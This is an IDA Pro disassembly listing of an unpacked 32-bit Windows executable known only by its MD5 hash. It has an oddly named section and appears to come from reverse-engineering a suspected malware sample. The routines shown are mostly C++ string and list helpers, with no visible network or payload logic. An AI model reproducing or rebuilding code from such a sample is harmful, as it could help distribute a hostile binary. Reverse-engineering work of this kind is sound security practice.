;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |	This file is generated by The Interactive Disassembler (IDA)	    |
; |	Copyright (c) 2007 by DataRescue sa/nv,	<ida@datarescue.com>	    |
; |		  Licensed to: SRI, 1 computer,	std, 05/2007		    |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	763752B5A9AB47E6931446C6701AA48C

; File Name   :	u:\work\763752b5a9ab47e6931446c6701aa48c_unpacked.exe
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 0001D000 ( 118784.)
; Section size in file		: 0001D000 ( 118784.)
; Offset to raw	data for section: 00001000
; Flags	E0000020: Text Executable Readable Writable
; Alignment	: default


unicode		macro page,string,zero
		irpc c,<string>
		db '&c', page
		endm
		ifnb <zero>
		dw zero
		endif
endm

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 401000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401000	proc near		; CODE XREF: sub_401141+79p
					; sub_4011D3+25p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_403500
		mov	eax, [ebp+arg_0]
		add	esp, 10h
		pop	ebp
		retn
sub_401000	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40101C	proc near		; CODE XREF: sub_4012AC+50p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40312E
		mov	eax, [ebp+arg_0]
		add	esp, 10h
		pop	ebp
		retn
sub_40101C	endp


; =============== S U B	R O U T	I N E =======================================



sub_401038	proc near		; DATA XREF: zcrshv4o:00422F14o
		mov	dword ptr [ecx], offset	off_41E334
		jmp	sub_403258
sub_401038	endp

; ---------------------------------------------------------------------------

loc_401043:				; DATA XREF: zcrshv4o:off_41E334o
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41E334
		call	sub_403258
		test	byte ptr [esp+8], 1
		jz	short loc_40105F
		push	esi
		call	sub_4034FB
		pop	ecx

loc_40105F:				; CODE XREF: .text:00401056j
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_401065	proc near		; CODE XREF: sub_40121E+43p
					; sub_4016BA+43p ...
		push	4
		mov	eax, offset loc_41CDBC
		call	sub_404B8C
		mov	esi, ecx
		mov	[ebp-10h], esi
		call	sub_403189
		and	dword ptr [ebp-4], 0
		push	dword ptr [ebp+8]
		lea	ecx, [esi+0Ch]
		mov	dword ptr [esi], offset	off_41E340
		call	sub_401111
		mov	eax, esi
		call	sub_404C2B
		retn	4
sub_401065	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40109A	proc near		; CODE XREF: .text:004010C8p
					; .text:004010E7j ...
		push	esi
		mov	esi, ecx
		push	0
		push	1
		lea	ecx, [esi+0Ch]
		mov	dword ptr [esi], offset	off_41E340
		call	sub_4011D3
		mov	ecx, esi
		pop	esi
		jmp	sub_403258
sub_40109A	endp


; =============== S U B	R O U T	I N E =======================================



sub_4010B7	proc near		; DATA XREF: zcrshv4o:0041E344o
					; zcrshv4o:0041E350o ...
		cmp	dword ptr [ecx+24h], 10h
		jb	short loc_4010C1
		mov	eax, [ecx+10h]
		retn
; ---------------------------------------------------------------------------

loc_4010C1:				; CODE XREF: sub_4010B7+4j
		lea	eax, [ecx+10h]
		retn
sub_4010B7	endp

; ---------------------------------------------------------------------------

loc_4010C5:				; DATA XREF: zcrshv4o:off_41E340o
		push	esi
		mov	esi, ecx
		call	sub_40109A
		test	byte ptr [esp+8], 1
		jz	short loc_4010DB
		push	esi
		call	sub_4034FB
		pop	ecx

loc_4010DB:				; CODE XREF: .text:004010D2j
		mov	eax, esi
		pop	esi
		retn	4
; ---------------------------------------------------------------------------

loc_4010E1:				; DATA XREF: zcrshv4o:00422EDCo
		mov	dword ptr [ecx], offset	off_41E34C
		jmp	sub_40109A
; ---------------------------------------------------------------------------

loc_4010EC:				; DATA XREF: zcrshv4o:off_41E34Co
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41E34C
		call	sub_40109A
		test	byte ptr [esp+8], 1
		jz	short loc_401108
		push	esi
		call	sub_4034FB
		pop	ecx

loc_401108:				; CODE XREF: .text:004010FFj
		mov	eax, esi
		pop	esi
		retn	4
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_21. PRESS	KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_401111	proc near		; CODE XREF: sub_401065+26p
					; sub_4013E6+2Bp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, ecx
		push	0
		mov	dword ptr [esi+18h], 0Fh
		call	sub_40131B
		push	0FFFFFFFFh
		push	0
		push	[esp+0Ch+arg_0]
		mov	ecx, esi
		call	sub_401141
		mov	eax, esi
		pop	esi
		retn	4
sub_401111	endp

; ---------------------------------------------------------------------------

loc_401137:				; CODE XREF: .text:0041CD5Ej
					; .text:0041CDDAj ...
		push	0
		push	1
		call	sub_4011D3
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401141	proc near		; CODE XREF: sub_401111+1Bp
					; sub_401547+2Bp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_4]
		push	ebx
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		cmp	[edi+14h], eax
		mov	ebx, ecx
		jnb	short loc_401159
		call	sub_402C47

loc_401159:				; CODE XREF: sub_401141+11j
		mov	esi, [edi+14h]
		mov	eax, [ebp+arg_4]
		sub	esi, eax
		cmp	[ebp+arg_8], esi
		jnb	short loc_401169
		mov	esi, [ebp+arg_8]

loc_401169:				; CODE XREF: sub_401141+23j
		cmp	ebx, edi
		mov	ecx, ebx
		jnz	short loc_401187
		push	0FFFFFFFFh
		add	esi, eax
		push	esi
		call	sub_4012AC
		push	[ebp+arg_4]
		mov	ecx, ebx
		push	0
		call	sub_4012AC
		jmp	short loc_4011CA
; ---------------------------------------------------------------------------

loc_401187:				; CODE XREF: sub_401141+2Cj
		push	0
		push	esi
		call	sub_401337
		test	al, al
		jz	short loc_4011CA
		cmp	dword ptr [edi+18h], 10h
		jb	short loc_40119E
		mov	edi, [edi+4]
		jmp	short loc_4011A1
; ---------------------------------------------------------------------------

loc_40119E:				; CODE XREF: sub_401141+56j
		add	edi, 4

loc_4011A1:				; CODE XREF: sub_401141+5Bj
		mov	ecx, [ebx+18h]
		cmp	ecx, 10h
		jb	short loc_4011AE
		mov	eax, [ebx+4]
		jmp	short loc_4011B1
; ---------------------------------------------------------------------------

loc_4011AE:				; CODE XREF: sub_401141+66j
		lea	eax, [ebx+4]

loc_4011B1:				; CODE XREF: sub_401141+6Bj
		mov	edx, [ebp+arg_4]
		push	esi
		add	edi, edx
		push	edi
		push	ecx
		push	eax
		call	sub_401000
		add	esp, 10h
		push	esi
		mov	ecx, ebx
		call	sub_40131B

loc_4011CA:				; CODE XREF: sub_401141+44j
					; sub_401141+50j
		pop	edi
		pop	esi
		mov	eax, ebx
		pop	ebx
		pop	ebp
		retn	0Ch
sub_401141	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4011D3	proc near		; CODE XREF: sub_40109A+10p
					; .text:0040113Bp ...

arg_0		= byte ptr  4
arg_4		= dword	ptr  8

		cmp	[esp+arg_0], 0
		push	esi
		mov	esi, ecx
		jz	short loc_401208
		cmp	dword ptr [esi+18h], 10h
		jb	short loc_401208
		cmp	[esp+4+arg_4], 0
		lea	eax, [esi+4]
		push	edi
		mov	edi, [eax]
		jbe	short loc_401200
		push	[esp+8+arg_4]
		push	edi
		push	10h
		push	eax
		call	sub_401000
		add	esp, 10h

loc_401200:				; CODE XREF: sub_4011D3+1Bj
		push	edi
		call	sub_4034FB
		pop	ecx
		pop	edi

loc_401208:				; CODE XREF: sub_4011D3+8j
					; sub_4011D3+Ej
		push	[esp+4+arg_4]
		mov	ecx, esi
		mov	dword ptr [esi+18h], 0Fh
		call	sub_40131B
		pop	esi
		retn	8
sub_4011D3	endp


; =============== S U B	R O U T	I N E =======================================



sub_40121E	proc near		; CODE XREF: sub_41C71F+4Ap
		push	44h
		mov	eax, offset loc_41CE87
		call	sub_404B8C
		push	dword ptr [ebp+10h]
		mov	esi, [ebp+0Ch]
		push	dword ptr [esi+4]
		push	esi
		call	sub_401395
		mov	ecx, 0FC0FC0h
		sub	ecx, dword_437E44
		cmp	ecx, 1
		jnb	short loc_40127B
		push	offset aListTTooLong ; "list<T>	too long"
		lea	ecx, [ebp-28h]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-28h]
		push	eax
		lea	ecx, [ebp-50h]
		call	sub_401065
		push	offset dword_422ED8
		lea	eax, [ebp-50h]
		push	eax
		mov	dword ptr [ebp-50h], offset off_41E34C
		call	sub_40477B

loc_40127B:				; CODE XREF: sub_40121E+29j
		inc	dword_437E44
		mov	[esi+4], eax
		mov	ecx, [eax+4]
		mov	[ecx], eax
		call	sub_404C2B
		retn	0Ch
sub_40121E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_401291	proc near		; CODE XREF: .text:loc_41CFABp
		push	10Ch
		call	sub_4035D9
		test	eax, eax
		pop	ecx
		jz	short loc_4012A2
		mov	[eax], eax

loc_4012A2:				; CODE XREF: sub_401291+Dj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short locret_4012AB
		mov	[ecx], eax

locret_4012AB:				; CODE XREF: sub_401291+16j
		retn
sub_401291	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4012AC	proc near		; CODE XREF: sub_401141+33p
					; sub_401141+3Fp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		mov	esi, ecx
		cmp	[esi+14h], edi
		jnb	short loc_4012C0
		call	sub_402C47

loc_4012C0:				; CODE XREF: sub_4012AC+Dj
		mov	eax, [esi+14h]
		sub	eax, edi
		cmp	eax, [ebp+arg_4]
		jnb	short loc_4012CD
		mov	[ebp+arg_4], eax

loc_4012CD:				; CODE XREF: sub_4012AC+1Cj
		cmp	[ebp+arg_4], 0
		jbe	short loc_401313
		mov	ecx, [esi+18h]
		cmp	ecx, 10h
		push	ebx
		lea	edx, [esi+4]
		jb	short loc_4012E3
		mov	ebx, [edx]
		jmp	short loc_4012E5
; ---------------------------------------------------------------------------

loc_4012E3:				; CODE XREF: sub_4012AC+31j
		mov	ebx, edx

loc_4012E5:				; CODE XREF: sub_4012AC+35j
		cmp	ecx, 10h
		jb	short loc_4012EC
		mov	edx, [edx]

loc_4012EC:				; CODE XREF: sub_4012AC+3Cj
		sub	eax, [ebp+arg_4]
		add	ebx, edi
		add	ebx, [ebp+arg_4]
		push	eax
		push	ebx
		sub	ecx, edi
		push	ecx
		add	edx, edi
		push	edx
		call	sub_40101C
		mov	eax, [esi+14h]
		sub	eax, [ebp+arg_4]
		add	esp, 10h
		push	eax
		mov	ecx, esi
		call	sub_40131B
		pop	ebx

loc_401313:				; CODE XREF: sub_4012AC+25j
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebp
		retn	8
sub_4012AC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40131B	proc near		; CODE XREF: sub_401111+Cp
					; sub_401141+84p ...

arg_0		= dword	ptr  4

		cmp	dword ptr [ecx+18h], 10h
		mov	eax, [esp+arg_0]
		mov	[ecx+14h], eax
		jb	short loc_40132D
		mov	ecx, [ecx+4]
		jmp	short loc_401330
; ---------------------------------------------------------------------------

loc_40132D:				; CODE XREF: sub_40131B+Bj
		add	ecx, 4

loc_401330:				; CODE XREF: sub_40131B+10j
		mov	byte ptr [ecx+eax], 0
		retn	4
sub_40131B	endp


; =============== S U B	R O U T	I N E =======================================



sub_401337	proc near		; CODE XREF: sub_401141+49p
					; sub_401547+39p

arg_0		= dword	ptr  4
arg_4		= byte ptr  8

		push	esi
		push	edi
		mov	edi, [esp+8+arg_0]
		cmp	edi, 0FFFFFFFEh
		mov	esi, ecx
		jbe	short loc_401349
		call	sub_402C08

loc_401349:				; CODE XREF: sub_401337+Bj
		cmp	[esi+18h], edi
		jnb	short loc_40135B
		push	dword ptr [esi+14h]
		mov	ecx, esi
		push	edi
		call	sub_401442
		jmp	short loc_401388
; ---------------------------------------------------------------------------

loc_40135B:				; CODE XREF: sub_401337+15j
		cmp	[esp+8+arg_4], 0
		jz	short loc_40137C
		cmp	edi, 10h
		jnb	short loc_40137C
		mov	eax, [esi+14h]
		cmp	edi, eax
		jnb	short loc_401370
		mov	eax, edi

loc_401370:				; CODE XREF: sub_401337+35j
		push	eax
		push	1
		mov	ecx, esi
		call	sub_4011D3
		jmp	short loc_401388
; ---------------------------------------------------------------------------

loc_40137C:				; CODE XREF: sub_401337+29j
					; sub_401337+2Ej
		test	edi, edi
		jnz	short loc_401388
		push	edi
		mov	ecx, esi
		call	sub_40131B

loc_401388:				; CODE XREF: sub_401337+22j
					; sub_401337+43j ...
		xor	eax, eax
		cmp	eax, edi
		sbb	eax, eax
		pop	edi
		neg	eax
		pop	esi
		retn	8
sub_401337	endp


; =============== S U B	R O U T	I N E =======================================



sub_401395	proc near		; CODE XREF: sub_40121E+16p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	10Ch
		call	sub_4035D9
		test	eax, eax
		pop	ecx
		jz	short loc_4013AA
		mov	ecx, [esp+arg_0]
		mov	[eax], ecx

loc_4013AA:				; CODE XREF: sub_401395+Dj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short loc_4013B7
		mov	edx, [esp+arg_4]
		mov	[ecx], edx

loc_4013B7:				; CODE XREF: sub_401395+1Aj
		push	edi
		lea	edi, [eax+8]
		test	edi, edi
		jz	short loc_4013CA
		push	esi
		mov	esi, [esp+8+arg_8]
		push	41h
		pop	ecx
		rep movsd
		pop	esi

loc_4013CA:				; CODE XREF: sub_401395+28j
		pop	edi
		retn	0Ch
sub_401395	endp

; ---------------------------------------------------------------------------
		push	esi
		push	dword ptr [esp+8]
		mov	esi, ecx
		call	sub_4013E6
		mov	dword ptr [esi], offset	off_41E34C
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_4013E6	proc near		; CODE XREF: .text:004013D5p
					; sub_402C47+46p
		push	4
		mov	eax, offset loc_41CDBC
		call	sub_404B8C
		mov	esi, ecx
		mov	[ebp-10h], esi
		mov	edi, [ebp+8]
		push	edi
		call	sub_403200
		and	dword ptr [ebp-4], 0
		add	edi, 0Ch
		push	edi
		lea	ecx, [esi+0Ch]
		mov	dword ptr [esi], offset	off_41E340
		call	sub_401111
		mov	eax, esi
		call	sub_404C2B
		retn	4
sub_4013E6	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_401420	proc near		; CODE XREF: sub_40121E+33p
					; sub_4016BA+33p ...

arg_0		= dword	ptr  4

		push	esi
		mov	esi, ecx
		push	0
		mov	dword ptr [esi+18h], 0Fh
		call	sub_40131B
		push	[esp+4+arg_0]
		mov	ecx, esi
		call	sub_401524
		mov	eax, esi
		pop	esi
		retn	4
sub_401420	endp


; =============== S U B	R O U T	I N E =======================================



sub_401442	proc near		; CODE XREF: sub_401337+1Dp
		push	0Ch
		mov	eax, offset sub_41CD99
		call	sub_404BBF
		mov	edi, ecx
		mov	[ebp-18h], edi
		mov	esi, [ebp+8]
		or	esi, 0Fh
		cmp	esi, 0FFFFFFFEh
		jbe	short loc_401463
		mov	esi, [ebp+8]
		jmp	short loc_401488
; ---------------------------------------------------------------------------

loc_401463:				; CODE XREF: sub_401442+1Aj
		xor	edx, edx
		push	3
		mov	eax, esi
		pop	ebx
		div	ebx
		mov	ecx, [edi+18h]
		mov	[ebp-14h], ecx
		shr	dword ptr [ebp-14h], 1
		mov	edx, [ebp-14h]
		cmp	eax, edx
		jnb	short loc_401488
		push	0FFFFFFFEh
		pop	eax
		sub	eax, edx
		cmp	ecx, eax
		ja	short loc_401488
		lea	esi, [edx+ecx]

loc_401488:				; CODE XREF: sub_401442+1Fj
					; sub_401442+38j ...
		and	dword ptr [ebp-4], 0
		lea	eax, [esi+1]
		push	0
		push	eax
		call	sub_4015ED
		pop	ecx
		pop	ecx
		mov	ebx, eax
		jmp	short loc_4014C7
; ---------------------------------------------------------------------------

loc_40149D:				; DATA XREF: zcrshv4o:0042300Co
		mov	eax, [ebp+8]
		mov	[ebp-10h], esp
		mov	[ebp+8], eax
		inc	eax
		push	0
		push	eax
		mov	byte ptr [ebp-4], 2
		call	sub_4015ED
		pop	ecx
		mov	[ebp-14h], eax
		pop	ecx
		mov	eax, offset loc_4014BE
		retn
; ---------------------------------------------------------------------------

loc_4014BE:				; DATA XREF: sub_401442+76o
		mov	edi, [ebp-18h]
		mov	esi, [ebp+8]
		mov	ebx, [ebp-14h]

loc_4014C7:				; CODE XREF: sub_401442+59j
		cmp	dword ptr [ebp+0Ch], 0
		jbe	short loc_4014EC
		cmp	dword ptr [edi+18h], 10h
		jb	short loc_4014D8
		mov	eax, [edi+4]
		jmp	short loc_4014DB
; ---------------------------------------------------------------------------

loc_4014D8:				; CODE XREF: sub_401442+8Fj
		lea	eax, [edi+4]

loc_4014DB:				; CODE XREF: sub_401442+94j
		push	dword ptr [ebp+0Ch]
		push	eax
		lea	eax, [esi+1]
		push	eax
		push	ebx
		call	sub_401000
		add	esp, 10h

loc_4014EC:				; CODE XREF: sub_401442+89j
		push	0
		push	1
		mov	ecx, edi
		call	sub_4011D3
		push	dword ptr [ebp+0Ch]
		mov	ecx, edi
		mov	[edi+4], ebx
		mov	[edi+18h], esi
		call	sub_40131B
		call	sub_404C2B
		retn	8
sub_401442	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40150F	proc near		; DATA XREF: zcrshv4o:00422FFCo
		mov	ecx, [ebp-18h]
		xor	esi, esi
		push	esi
		push	1
		call	sub_4011D3
		push	esi
		push	esi
		call	sub_40477B
		int	3		; Trap to Debugger
sub_40150F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_401524	proc near		; CODE XREF: sub_401420+17p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		mov	esi, ecx
		lea	edx, [eax+1]

loc_40152E:				; CODE XREF: sub_401524+Fj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_40152E
		sub	eax, edx
		push	eax
		push	[esp+8+arg_0]
		mov	ecx, esi
		call	sub_401547
		pop	esi
		retn	4
sub_401524	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_401547	proc near		; CODE XREF: sub_401524+1Ap

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	esi
		push	edi
		mov	edi, [ebp+arg_0]
		push	edi
		mov	esi, ecx
		call	sub_4015B9
		test	al, al
		jz	short loc_401579
		cmp	dword ptr [esi+18h], 10h
		jb	short loc_401566
		mov	eax, [esi+4]
		jmp	short loc_401569
; ---------------------------------------------------------------------------

loc_401566:				; CODE XREF: sub_401547+18j
		lea	eax, [esi+4]

loc_401569:				; CODE XREF: sub_401547+1Dj
		push	[ebp+arg_4]
		sub	edi, eax
		push	edi
		push	esi
		mov	ecx, esi
		call	sub_401141
		jmp	short loc_4015B3
; ---------------------------------------------------------------------------

loc_401579:				; CODE XREF: sub_401547+12j
		push	0
		push	[ebp+arg_4]
		mov	ecx, esi
		call	sub_401337
		test	al, al
		jz	short loc_4015B1
		mov	ecx, [esi+18h]
		cmp	ecx, 10h
		jb	short loc_401596
		mov	eax, [esi+4]
		jmp	short loc_401599
; ---------------------------------------------------------------------------

loc_401596:				; CODE XREF: sub_401547+48j
		lea	eax, [esi+4]

loc_401599:				; CODE XREF: sub_401547+4Dj
		push	[ebp+arg_4]
		push	edi
		push	ecx
		push	eax
		call	sub_401000
		add	esp, 10h
		push	[ebp+arg_4]
		mov	ecx, esi
		call	sub_40131B

loc_4015B1:				; CODE XREF: sub_401547+40j
		mov	eax, esi

loc_4015B3:				; CODE XREF: sub_401547+30j
		pop	edi
		pop	esi
		pop	ebp
		retn	8
sub_401547	endp


; =============== S U B	R O U T	I N E =======================================



sub_4015B9	proc near		; CODE XREF: sub_401547+Bp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [ecx+18h]
		cmp	esi, 10h
		lea	eax, [ecx+4]
		jb	short loc_4015C9
		mov	edx, [eax]
		jmp	short loc_4015CB
; ---------------------------------------------------------------------------

loc_4015C9:				; CODE XREF: sub_4015B9+Aj
		mov	edx, eax

loc_4015CB:				; CODE XREF: sub_4015B9+Ej
		cmp	[esp+4+arg_0], edx
		jb	short loc_4015E7
		cmp	esi, 10h
		jb	short loc_4015D8
		mov	eax, [eax]

loc_4015D8:				; CODE XREF: sub_4015B9+1Bj
		mov	ecx, [ecx+14h]
		add	ecx, eax
		cmp	ecx, [esp+4+arg_0]
		jbe	short loc_4015E7
		mov	al, 1
		jmp	short loc_4015E9
; ---------------------------------------------------------------------------

loc_4015E7:				; CODE XREF: sub_4015B9+16j
					; sub_4015B9+28j
		xor	al, al

loc_4015E9:				; CODE XREF: sub_4015B9+2Cj
		pop	esi
		retn	4
sub_4015B9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4015ED	proc near		; CODE XREF: sub_401442+50p
					; sub_401442+6Cp

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		mov	ecx, [ebp+arg_0]
		sub	esp, 0Ch
		test	ecx, ecx
		ja	short loc_401605
		xor	ecx, ecx

loc_4015FC:				; CODE XREF: sub_4015ED+22j
		push	ecx
		call	sub_4035D9
		pop	ecx
		leave
		retn
; ---------------------------------------------------------------------------

loc_401605:				; CODE XREF: sub_4015ED+Bj
		or	eax, 0FFFFFFFFh
		xor	edx, edx
		div	ecx
		cmp	eax, 1
		jnb	short loc_4015FC
		and	[ebp+arg_0], 0
		lea	eax, [ebp+arg_0]
		push	eax
		lea	ecx, [ebp+var_C]
		call	sub_40319A
		push	offset dword_422F10
		lea	eax, [ebp+var_C]
		push	eax
		mov	[ebp+var_C], offset off_41E334
		call	sub_40477B
		int	3		; Trap to Debugger
		push	esi
		push	[esp+10h+var_8]
		mov	esi, ecx
		call	sub_403200
		mov	dword ptr [esi], offset	off_41E334
		mov	eax, esi
		pop	esi
		retn	4
sub_4015ED	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40164F	proc near		; CODE XREF: sub_401EF9+FFp
					; sub_402086+4Ep ...
		cmp	dword ptr [esi], 0
		jnz	short loc_401659
		call	sub_4034EB

loc_401659:				; CODE XREF: sub_40164F+3j
		mov	eax, [esi]
		mov	ecx, [esi+4]
		cmp	ecx, [eax+4]
		jnz	short loc_401668
		call	sub_4034EB

loc_401668:				; CODE XREF: sub_40164F+12j
		mov	eax, [esi+4]
		add	eax, 8
		retn
sub_40164F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40166F	proc near		; CODE XREF: sub_401EF9+11Ap
					; sub_402086+69p ...
		cmp	dword ptr [esi], 0
		mov	eax, [esi]
		mov	[edi], eax
		mov	eax, [esi+4]
		mov	[edi+4], eax
		jnz	short loc_401683
		call	sub_4034EB

loc_401683:				; CODE XREF: sub_40166F+Dj
		mov	eax, [esi]
		mov	ecx, [esi+4]
		cmp	ecx, [eax+4]
		jnz	short loc_401692
		call	sub_4034EB

loc_401692:				; CODE XREF: sub_40166F+1Cj
		mov	eax, [esi+4]
		mov	eax, [eax]
		mov	[esi+4], eax
		mov	eax, edi
		retn
sub_40166F	endp


; =============== S U B	R O U T	I N E =======================================



sub_40169D	proc near		; CODE XREF: sub_401EF9+F1p
					; sub_402086+40p ...
		mov	eax, [esi]
		test	eax, eax
		jz	short loc_4016A7
		cmp	eax, [edi]
		jz	short loc_4016AC

loc_4016A7:				; CODE XREF: sub_40169D+4j
		call	sub_4034EB

loc_4016AC:				; CODE XREF: sub_40169D+8j
		mov	eax, [esi+4]
		xor	ecx, ecx
		cmp	eax, [edi+4]
		setnz	cl
		mov	al, cl
		retn
sub_40169D	endp


; =============== S U B	R O U T	I N E =======================================



sub_4016BA	proc near		; CODE XREF: sub_414D0E+54p
		push	48h
		mov	eax, offset loc_41CDDF
		call	sub_404B8C
		push	dword ptr [ebp+8]
		mov	esi, [ebp+10h]
		push	dword ptr [esi+4]
		push	esi
		call	sub_401745
		mov	ecx, 3C3C3C3h
		sub	ecx, dword_437E50
		cmp	ecx, 1
		jnb	short loc_401717
		push	offset aListTTooLong ; "list<T>	too long"
		lea	ecx, [ebp-2Ch]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-2Ch]
		push	eax
		lea	ecx, [ebp-54h]
		call	sub_401065
		push	offset dword_422ED8
		lea	eax, [ebp-54h]
		push	eax
		mov	dword ptr [ebp-54h], offset off_41E34C
		call	sub_40477B

loc_401717:				; CODE XREF: sub_4016BA+29j
		inc	dword_437E50
		mov	[esi+4], eax
		mov	ecx, [eax+4]
		mov	[ecx], eax
		call	sub_404C2B
		retn	0Ch
sub_4016BA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_40172D	proc near		; CODE XREF: .text:loc_41CFC8p
		push	4Ch
		call	sub_4035D9
		test	eax, eax
		pop	ecx
		jz	short loc_40173B
		mov	[eax], eax

loc_40173B:				; CODE XREF: sub_40172D+Aj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short locret_401744
		mov	[ecx], eax

locret_401744:				; CODE XREF: sub_40172D+13j
		retn
sub_40172D	endp


; =============== S U B	R O U T	I N E =======================================



sub_401745	proc near		; CODE XREF: sub_4016BA+16p

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	4Ch
		call	sub_4035D9
		test	eax, eax
		pop	ecx
		jz	short loc_401757
		mov	ecx, [esp+arg_0]
		mov	[eax], ecx

loc_401757:				; CODE XREF: sub_401745+Aj
		lea	ecx, [eax+4]
		test	ecx, ecx
		jz	short loc_401764
		mov	edx, [esp+arg_4]
		mov	[ecx], edx

loc_401764:				; CODE XREF: sub_401745+17j
		push	edi
		lea	edi, [eax+8]
		test	edi, edi
		jz	short loc_401777
		push	esi
		mov	esi, [esp+8+arg_8]
		push	11h
		pop	ecx
		rep movsd
		pop	esi

loc_401777:				; CODE XREF: sub_401745+25j
		pop	edi
		retn	0Ch
sub_401745	endp


; =============== S U B	R O U T	I N E =======================================



sub_40177B	proc near		; DATA XREF: zcrshv4o:off_421C64o
		push	4B8h
		mov	eax, offset loc_41CF83
		call	sub_404BF5
		cmp	dword ptr [ebp+1Ch], 3
		mov	eax, [ebp+10h]
		mov	edi, [ebp+20h]
		mov	[ebp-4C4h], eax
		mov	eax, [ebp+18h]
		mov	[ebp-4BCh], eax
		mov	[ebp-4C0h], edi
		jl	loc_4019D5
		mov	esi, 0BFh
		xor	ebx, ebx
		push	esi
		lea	eax, [ebp-18Fh]
		push	ebx
		push	eax
		mov	[ebp-190h], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp-0CFh]
		push	ebx
		push	eax
		mov	[ebp-0D0h], bl
		call	sub_408130
		push	dword ptr [edi+4]
		lea	edi, [ebp-190h]
		call	sub_41C177
		push	0C0h
		lea	esi, [ebp-0D0h]
		mov	ebx, offset dword_427C10
		call	sub_41A301
		add	esp, 20h
		cmp	byte ptr [ebp+8], 0
		jz	short loc_401817
		cmp	byte_427C0A, 0
		jz	loc_4019EB

loc_401817:				; CODE XREF: sub_40177B+8Dj
		lea	ecx, [ebp-0D0h]
		lea	eax, [ebp-190h]

loc_401823:				; CODE XREF: sub_40177B+C0j
		mov	dl, [eax]
		cmp	dl, [ecx]
		jnz	short loc_401841
		test	dl, dl
		jz	short loc_40183D
		mov	dl, [eax+1]
		cmp	dl, [ecx+1]
		jnz	short loc_401841
		inc	eax
		inc	eax
		inc	ecx
		inc	ecx
		test	dl, dl
		jnz	short loc_401823

loc_40183D:				; CODE XREF: sub_40177B+B0j
		xor	eax, eax
		jmp	short loc_401846
; ---------------------------------------------------------------------------

loc_401841:				; CODE XREF: sub_40177B+ACj
					; sub_40177B+B8j
		sbb	eax, eax
		sbb	eax, 0FFFFFFFFh

loc_401846:				; CODE XREF: sub_40177B+C4j
		test	eax, eax
		jnz	loc_4019C8
		push	327h
		push	eax
		lea	eax, [ebp-4B8h]
		push	eax
		call	sub_408130
		push	dword ptr [ebp-4BCh]
		mov	esi, offset dword_421BF8
		push	esi
		mov	edi, 0FFh
		lea	eax, [ebp-4B8h]
